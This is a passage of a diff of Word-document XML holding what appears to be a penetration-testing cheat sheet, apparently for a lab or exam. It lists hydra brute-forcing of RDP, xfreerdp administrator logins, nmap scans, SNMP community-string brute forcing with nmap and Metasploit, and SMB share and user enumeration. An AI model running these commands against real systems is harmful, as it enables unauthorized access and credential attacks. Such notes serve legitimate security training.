+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🔑</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Bruteforce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> RDP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>hydra -L users.txt -P rockyou.txt rdp://&lt;ip&gt; -s 3333</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🖥️</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Login RDP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xfreerdp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>u:administrator</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>p:password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /v:&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;:3333</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -127,6 +1238,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Example output:</w:t>
       </w:r>
     </w:p>
@@ -912,155 +2024,155 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3333</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Hydra -L /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/wordlists -p /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/wordlists rdp://ip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -s 3333</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Xfreedp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>u:administrator</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>p:qwertyuiop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>v:ip</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:3333</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Set </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>rport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3333</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Hydra -L /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/share/wordlists -p /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/share/wordlists rdp://ip</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -s 3333</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Xfreedp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>u:administrator</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>p:qwertyuiop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>v:ip</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:3333</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>Nmap -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1099,1118 +2211,6 @@
         <w:t>ip</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>1. RECON / HOST DISCOVERY</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netdiscover</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -r &lt;subnet&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;subnet&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -A -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;target&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>📡</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2. SNMP ENUMERATION (VERY IMPORTANT)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🔍</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Check SNMP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>snmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-check &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sU</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 161 &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🔑</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Brute SNMP Community Strings</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sU</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 161 --script=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>snmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-brute &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-        </w:rPr>
-        <w:t>👉</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Common result:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">public </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-        </w:rPr>
-        <w:t>✅</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">private </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-        </w:rPr>
-        <w:t>✅</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🧠</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Get Info via Scripts</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sU</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 161 --script=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>snmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-processes &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sU</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 161 --script=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>snmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-interfaces &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>💥</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Metasploit SNMP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">search </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>snmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>use auxiliary/scanner/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>snmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>snmp_login</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>set RHOSTS &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🖥️</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3. SMB ENUMERATION</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>🔍</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Scan SMB</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 445 &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>📂</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Enumerate Shares &amp; Users</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 445 --script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-shares &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 445 --script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-users &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🔐</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> With Credentials</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 445 --script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-users \</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
